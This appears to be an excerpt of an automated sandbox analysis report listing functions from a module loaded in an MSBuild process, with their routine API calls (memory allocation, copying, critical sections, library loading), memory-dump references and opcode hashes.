                                                                                                                                                                                                                      Function 6C89BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C89BEE3
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C89BEF5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$CallsDisableLoadThread
                                                                                                                                                                                                                      • String ID: cryptbase.dll
                                                                                                                                                                                                                      • API String ID: 4137859361-1262567842
                                                                                                                                                                                                                      • Opcode ID: f66af620cfd7f94647d81936a75d3ff2ecd7866ca8d24a6eeea5aefcfe4d7728
                                                                                                                                                                                                                      • Instruction ID: c516bc610629874a094987281a1a286539e49d4fafe5e4dae9d511b373cba992
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f66af620cfd7f94647d81936a75d3ff2ecd7866ca8d24a6eeea5aefcfe4d7728
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D0C731384508E6D7606B548D09F2D377D9751715F20C429F75554951C7B19450CF94
                                                                                                                                                                                                                      Function 6C8850E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C884E9C,?,?,?,?,?), ref: 6C88510A
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C884E9C,?,?,?,?,?), ref: 6C885167
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C885196
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C884E9C), ref: 6C885234
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                      • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                      • Instruction ID: 0862d9793eed1a71c7ceaf3aa6b14a0ca8ba874b37173e47542e6942a2342c75
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1991B039506616CFDB25CF08C490A56BBA2FF89318B28898CDC599BB15D771FC42CBE0
                                                                                                                                                                                                                      Function 6C8C08F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C0918
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C09A6
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7DC,?,00000000), ref: 6C8C09F3
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7DC), ref: 6C8C0ACB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                      • Opcode ID: 3da893914a665e77bb07a858c4a6810fd50b8be4756a60932180d9d6ce9197ff
                                                                                                                                                                                                                      • Instruction ID: 69f992453e4207e0d748023206186064651edc671f72c643c4d899de201e1808
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3da893914a665e77bb07a858c4a6810fd50b8be4756a60932180d9d6ce9197ff
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F514B72B096548BEB289B59C54076673B1EB82FA8B34493EDDA597F80D730FC0587C2
                                                                                                                                                                                                                      Function 6C8E59C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6C8BE56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6C8E5A47
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6C8BE56A,?,|UrlbarCSSSpan), ref: 6C8E5A5C
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8E5A97
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6C8E5B9D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$mallocmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2682772760-0
                                                                                                                                                                                                                      • Opcode ID: 17d5d41e8c94a22d11ed0944395930765eb28fc98e10d345ec1fca6e9a8067e3
                                                                                                                                                                                                                      • Instruction ID: 795f6eabcb3bb54c355a56c9883198aeba6e5732a04a307ddeadc8159f0a3752
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17d5d41e8c94a22d11ed0944395930765eb28fc98e10d345ec1fca6e9a8067e3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD518C706087509FD710CF29C9C0A1ABBE5FF8E318F04C96DE8889B642D774D944CB62
                                                                                                                                                                                                                      Function 6C8DB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C8DB2C9,?,?,?,6C8DB127,?,?,?,?,?,?,?,?,?,6C8DAE52), ref: 6C8DB628
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D90FF
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D9108
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C8DB2C9,?,?,?,6C8DB127,?,?,?,?,?,?,?,?,?,6C8DAE52), ref: 6C8DB67D
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C8DB2C9,?,?,?,6C8DB127,?,?,?,?,?,?,?,?,?,6C8DAE52), ref: 6C8DB708
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C8DB127,?,?,?,?,?,?,?,?), ref: 6C8DB74D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      • Opcode ID: a0b721b1c31dc0433fb2474de59d53cc7600bb864e50b956d6bb7a2d271f94a3
                                                                                                                                                                                                                      • Instruction ID: 93d738697969b3de165be9bb424ab7963ebd996d16f9ec5b58586ea2b6b82eb5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0b721b1c31dc0433fb2474de59d53cc7600bb864e50b956d6bb7a2d271f94a3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51AE71A052168FDB24CF58DA8076EB7B5FF46304F56892DD85AAB710DB31BC04CBA1
                                                                                                                                                                                                                      Function 6C8DDF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C8CFF2A), ref: 6C8DDFFD
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D90FF
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D9108
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C8CFF2A), ref: 6C8DE04A
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C8CFF2A), ref: 6C8DE0C0
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C8CFF2A), ref: 6C8DE0FE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3061335427-0
                                                                                                                                                                                                                      • Opcode ID: a787159546b3cba1225640922aba383a8a7685f01a47aeb3027d8ac821a777ee
                                                                                                                                                                                                                      • Instruction ID: 61f1f33ebcd69674faf5041b252b6acdfeef724c8dba2646a156f81749871ca0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a787159546b3cba1225640922aba383a8a7685f01a47aeb3027d8ac821a777ee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76419EB17042168BEB24CF68DA8035AB7B6BB45308F264939D516DBB40E731F904CBA2
                                                                                                                                                                                                                      Function 6C8D6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C8D6EAB
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C8D6EFA
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C8D6F1E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8D6F5C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$freememcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4259248891-0
                                                                                                                                                                                                                      • Opcode ID: 738db7931eb72c22836464132dd13e32be64b457d763c57f74af4cda47fa25a6
                                                                                                                                                                                                                      • Instruction ID: 1770fe224915a869bd8eff8ecb55aaf7574c7a06a8429dcd98b73ae0cb56177b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 738db7931eb72c22836464132dd13e32be64b457d763c57f74af4cda47fa25a6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1231E771A10A0A8FDB14CF2CCA806AA73F9EB84344F61493DD41AC7651EB31E659C7A1
                                                                                                                                                                                                                      Function 6C8EB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C890A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8EB5EA
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C890A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8EB623
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C890A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8EB66C
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C890A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8EB67F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc$free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1480856625-0
                                                                                                                                                                                                                      • Opcode ID: 0d38ed1221916757ba5ea878bf794a065d2db6bb6ccf06f0d2985c972c5cfb35
                                                                                                                                                                                                                      • Instruction ID: 729d418e2229facfbce8414e519343f2896772014bd4c19eccaffa101ed3e3e6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d38ed1221916757ba5ea878bf794a065d2db6bb6ccf06f0d2985c972c5cfb35
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C31E671A013168FEB20CF58C98466ABBF5FF86304F168969C8069B321DB31ED15CBE5
                                                                                                                                                                                                                      Function 6C8BF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C8BF611
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C8BF623
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C8BF652
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C8BF668
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                      • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                      • Instruction ID: 648eb9f1cea4454a8d2b2d455aea9611763551080d68e63f954e31e998e3693a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6318F79A00214AFC724CF1DCEC0A9B77B9EB94344B148938FA4A8BB09D671E9448B90
                                                                                                                                                                                                                      Function 6C8839A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744,6C8E7765,00000000,6C8E7765,?,6C8A6112), ref: 6C8839AF
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E744,?,6C8A6112), ref: 6C883A34
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784,6C8A6112), ref: 6C883A4B
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C883A5F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                                      • Opcode ID: f735702868123e4d2cb22514c8db3e17f0ab0491a79ec619fb844ee1dcfa739d
                                                                                                                                                                                                                      • Instruction ID: 55e4f9b7bfe761d883e481d8f060b926da511fd5b7a25b609627f49932c3a2ef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f735702868123e4d2cb22514c8db3e17f0ab0491a79ec619fb844ee1dcfa739d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7921E53270AB058FC725DE69C955A2A73B1EF86B187340D2DC9A597F40D770EC058791
                                                                                                                                                                                                                      Function 6C89B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C89B96F
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C89B99A
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C89B9B0
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C89B9B9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$freemalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3313557100-0
                                                                                                                                                                                                                      • Opcode ID: 9febcda53867da10095159dbe4a2d06acf29c127d08eaa85a41f7b79ca0eafe9
                                                                                                                                                                                                                      • Instruction ID: 57c3fa2dcacd8dc4091cf1057c95f1bd2e5125f9e372375eb09f997c10bed327
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9febcda53867da10095159dbe4a2d06acf29c127d08eaa85a41f7b79ca0eafe9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF1142B1A002059FCB24DF6DD9808ABB7F8BF98354B14893AE919D3701E771E915CAA1
                                                                                                                                                                                                                      Function 6C8D26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                      • Opcode ID: 4095d878e4a82e607148f77b07d787325db991565fbad81491046596fe7e5de1
                                                                                                                                                                                                                      • Instruction ID: 8840507489ddc5fa6bf2d8429d1314bf1f3b3ccec29286f85cf150e47c9c0cc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4095d878e4a82e607148f77b07d787325db991565fbad81491046596fe7e5de1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF0F9B27013005BEB209A58E984947B3B9EF41218B214835FA1AC3B01E735FD59C7A2